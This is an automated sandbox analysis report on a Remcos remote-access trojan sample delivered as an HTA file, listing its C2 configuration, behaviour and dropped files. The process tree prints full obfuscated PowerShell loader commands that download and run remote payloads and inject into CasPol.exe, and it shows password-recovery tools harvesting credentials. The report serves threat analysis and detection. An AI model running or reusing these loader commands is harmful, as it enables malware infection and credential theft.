remcos | 76b6dfd52c8e728a974bb6122564ca779d8811cd3160dd20557a2a2228c23974

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
04-02-2025 19:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

shemygoodgirlwholovesmebestthignstobegoodforrmes.hta
Size

14KB
MD5

b88c259e79f89b18020b2af11487b53e
SHA1

632d89122dba2718319d2ae64f3ba8b73c557614
SHA256

76b6dfd52c8e728a974bb6122564ca779d8811cd3160dd20557a2a2228c23974
SHA512

b05ad7b57c73bb5ac905fe94b2b6c951bd534d4351ee4e5fd2c9e78912b7a3c40e21b5479dc3b4cea2ccfca73e9379e40a9d39bd63f05be30c785c31717ba183
SSDEEP

96:fSwF8+hkwF7+h9GjQIwX7fW2fswFDwFW+hTwFB+:qsvKsKPG0b7+BsDspVsw

Score

10^/10

remcos zyn30 collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zyn30

newtimeforrmsupdates.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-1MFHM3
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4068-110-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/3348-106-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4216-104-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4068-110-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4216-104-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
19	4228	powershell.exe
23	4484	powershell.exe
24	4484	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2904	cmd.exe
4228	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4484	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4484 set thread context of 2632	4484	powershell.exe	96
PID 2632 set thread context of 4216	2632	CasPol.exe	97
PID 2632 set thread context of 4068	2632	CasPol.exe	98
PID 2632 set thread context of 3348	2632	CasPol.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1121399784-3202166597-3503557106-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4228	powershell.exe
4228	powershell.exe
4484	powershell.exe
4484	powershell.exe
4216	CasPol.exe
4216	CasPol.exe
3348	CasPol.exe
3348	CasPol.exe
4216	CasPol.exe
4216	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2632	CasPol.exe
2632	CasPol.exe
2632	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	3348	CasPol.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 3684 wrote to memory of 2904	3684	mshta.exe	86
PID 3684 wrote to memory of 2904	3684	mshta.exe	86
PID 3684 wrote to memory of 2904	3684	mshta.exe	86
PID 2904 wrote to memory of 4228	2904	cmd.exe	88
PID 2904 wrote to memory of 4228	2904	cmd.exe	88
PID 2904 wrote to memory of 4228	2904	cmd.exe	88
PID 4228 wrote to memory of 4760	4228	powershell.exe	90
PID 4228 wrote to memory of 4760	4228	powershell.exe	90
PID 4228 wrote to memory of 4760	4228	powershell.exe	90
PID 4760 wrote to memory of 776	4760	csc.exe	91
PID 4760 wrote to memory of 776	4760	csc.exe	91
PID 4760 wrote to memory of 776	4760	csc.exe	91
PID 4228 wrote to memory of 2752	4228	powershell.exe	93
PID 4228 wrote to memory of 2752	4228	powershell.exe	93
PID 4228 wrote to memory of 2752	4228	powershell.exe	93
PID 2752 wrote to memory of 4484	2752	WScript.exe	94
PID 2752 wrote to memory of 4484	2752	WScript.exe	94
PID 2752 wrote to memory of 4484	2752	WScript.exe	94
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 4484 wrote to memory of 2632	4484	powershell.exe	96
PID 2632 wrote to memory of 4216	2632	CasPol.exe	97
PID 2632 wrote to memory of 4216	2632	CasPol.exe	97
PID 2632 wrote to memory of 4216	2632	CasPol.exe	97
PID 2632 wrote to memory of 4216	2632	CasPol.exe	97
PID 2632 wrote to memory of 4068	2632	CasPol.exe	98
PID 2632 wrote to memory of 4068	2632	CasPol.exe	98
PID 2632 wrote to memory of 4068	2632	CasPol.exe	98
PID 2632 wrote to memory of 4068	2632	CasPol.exe	98
PID 2632 wrote to memory of 3348	2632	CasPol.exe	99
PID 2632 wrote to memory of 3348	2632	CasPol.exe	99
PID 2632 wrote to memory of 3348	2632	CasPol.exe	99
PID 2632 wrote to memory of 3348	2632	CasPol.exe	99

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\shemygoodgirlwholovesmebestthignstobegoodforrmes.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOWersHELl.ExE -Ex bypasS -nop -W 1 -c DEViCEcreDentIALDePloYmenT ; Iex($(iex('[SysteM.tEXT.ENCOding]'+[Char]0X3A+[ChAr]58+'Utf8.gEtStrIng([sySTeM.CoNveRT]'+[ChAR]58+[cHAr]0X3a+'FrOMbAsE64stRiNG('+[ChAR]34+'JGszTnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVGSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWW5qeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXFxZHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUVGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJCR2tsQUhCdVF5WSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZk5xUUd1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGszTnU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjkuMTAuMzAveGFtcHAva2tucy9zaGVpc215YmVhdXRpZnVsbGFkeXdob2xvdmVzbWUuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyIsMCwwKTtzVGFSdC1zbEVFUCgzKTtJTnZPa2UtSXRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyI='+[ChAR]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWersHELl.ExE -Ex bypasS -nop -W 1 -c DEViCEcreDentIALDePloYmenT ; Iex($(iex('[SysteM.tEXT.ENCOding]'+[Char]0X3A+[ChAr]58+'Utf8.gEtStrIng([sySTeM.CoNveRT]'+[ChAR]58+[cHAr]0X3a+'FrOMbAsE64stRiNG('+[ChAR]34+'JGszTnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVGSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWW5qeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXFxZHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUVGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJCR2tsQUhCdVF5WSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZk5xUUd1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGszTnU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjkuMTAuMzAveGFtcHAva2tucy9zaGVpc215YmVhdXRpZnVsbGFkeXdob2xvdmVzbWUuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyIsMCwwKTtzVGFSdC1zbEVFUCgzKTtJTnZPa2UtSXRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyI='+[ChAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4228
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ll2g3mbk\ll2g3mbk.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4760
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAAF5.tmp" "c:\Users\Admin\AppData\Local\Temp\ll2g3mbk\CSC3A525526800748228662A9FAAB6ED3E3.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:776
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheismybeautifulladywholovesmbeautifullad.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2752
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAGkAdABlAHIAaQB0AG4AZQBoAHQAaQB3AGUAcgB1AHQAYwBpAHAAdABzAGUAYgB5AG0AZQBlAHMALwBzAG4AawBrAC8AcABwAG0AYQB4AC8AMAAzAC4AMAAxAC4AOQAyAC4ANQA4ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAG0AdwBuAG0AZQBtAGMAbQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA4ADYANAAwADAAOQA2AC8AeAA5AGUAdwB0AGwAZQBtAGYAcABoAGYAdwB2AGYAcwA4ADMAcwBzAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgAFsAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBtAGEAaQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4484
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2632
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ctrmevxgajftsgpicxiaoqxjcrfwfdywh"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4216
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\mvwffn"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4068
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ppcqfgtbk"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
cc100bb1646352e0b167e91f7d137b0a

SHA1
655590811fb0336e91c13d12f7d2cf4027349698

SHA256
7870242178471ba4478f62fcd931463c07b4782c2344e7bfecc9711f9dd8bab1

SHA512
d6412937801e924ab32e7e961bb798ec6fb3c8afd48cec5a7175c1c7de6843f3067611b4bd7965a05890a470645a44672a685a184e853fee4fdd102fcf6edd9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAAF5.tmp

Filesize
1KB

MD5
2ff15de88b919f967f761baac62cf88e

SHA1
1f3b7fe92f6a515bb3367fc8bb89ab220fd37932

SHA256
2bf142169be25a2d89c8e7322a21d132dca37b7c4ea881e519a371b6e960750e

SHA512
fadb201107d333c07a1947e51907a0e89a5b7c0df5d328501a6ef9f699d32308aa79b09b1a7fc2310a17abcdc8cc7adceca283d2cdd4e1b555bfa586e01a8f11

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ynqvas44.us3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ctrmevxgajftsgpicxiaoqxjcrfwfdywh

Filesize
4KB

MD5
9692557b6cb140cfd24cc675484da561

SHA1
219b44afdf0f21474c5de5209f809fb6380aafaf

SHA256
def2df7a49987ed2dd1126644c208a922251f240ff4151434747cc7f37b72f86

SHA512
6923b8800538b76855e7ae9f27a5eab0a5697664755cf1c58db7f39bc8a136274eac67b87c33d2b51d554e1422855dc8365731c5b65599c802f28773149f7d3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ll2g3mbk\ll2g3mbk.dll

Filesize
3KB

MD5
690acd064b00edb60d08cb4a52d58fa3

SHA1
7e0c75c1db2b68502f15984442f5b4bae76bbe6b

SHA256
28aa3f00c1d06e63f748b3828080863461422a0032e22ec83b4580c71ae1ed34

SHA512
b2412e5c13fe7e534c1b464bce88d68459927f0e8367453a44fade2db41c8c8038833fd4a50deadb77c0065e4d646a0de7aa553c30207c9843ddb4fae8681e15

Download Submit
C:\Users\Admin\AppData\Roaming\sheismybeautifulladywholovesmbeautifullad.vbs

Filesize
209KB

MD5
7dcf0b4585dd514d6320f1380cdf323c

SHA1
9800ed24aae82b984034dab184b0a2df4a21a81e

SHA256
f4f1b9da47072e15e360050cc4c3a78f6d1d7fe9c2695bd0b6680a1e2acb0987

SHA512
2d9d0d25992aa555f1e17995a73c3d610b8a170bcff4921184f8d54d78c23eb4e63acbd321367f583beaec260b3dd81b0a213931be47bc11612b4460e816d4b1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ll2g3mbk\CSC3A525526800748228662A9FAAB6ED3E3.TMP

Filesize
652B

MD5
991113afc5b11f070b60dfff9ff4654a

SHA1
e372cea9d736c4e5825b8a7f65549bd2baf40c09

SHA256
ec88d89a215110e42d29bfc1d137775c1bf527478e08b5e6f607754708120b9e

SHA512
6d9f72a1c81d2137c968247d4824cb6ad1cdd69e7ffbfe05131c4042f62a4f974f1d04de95893d0b1e7ae43d04182e7a5aa84306719559d8b88e6efbc86e218b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ll2g3mbk\ll2g3mbk.0.cs

Filesize
476B

MD5
5b2e7d35de72278f9da88c640f9e7481

SHA1
e5d0eb3c997e4bbb1e3e9f001858a6bd34019465

SHA256
5bb90192a83dd9ead0f6a41f002ac0cf6a9e4e7c3acaf08e9f8bf7b5947384c0

SHA512
e335d94e966c71e40f87b4bd595ce365b54992ce97aa33b0181ded2d19ec7f8fed59540215556e78181a39a714854d33f0aa6de506df2c1fc19f35e7d7a40d56

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ll2g3mbk\ll2g3mbk.cmdline

Filesize
369B

MD5
56fa768436a8ea780c77ad722be66b78

SHA1
39d39c72ec8771f0a5a7bc6d3527996079e28fd0

SHA256
77b63d6cc82d32a57091489f8baad34debe57dd7cb9860e3140a8452ea7752c5

SHA512
eecddfee40a9aad8b2d859f6e3520fb09be0407bc4bcc9d14c2f7bc17063089a3d229b0da14503c2afcc32f4f4ccfadbbbd53927cb43d2e911984964e98e5e57

Download Submit
memory/2632-93-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-123-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-117-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2632-113-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2632-118-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-128-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-127-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-88-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-89-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-124-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-90-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-116-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/2632-122-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-121-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-96-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-95-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2632-94-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
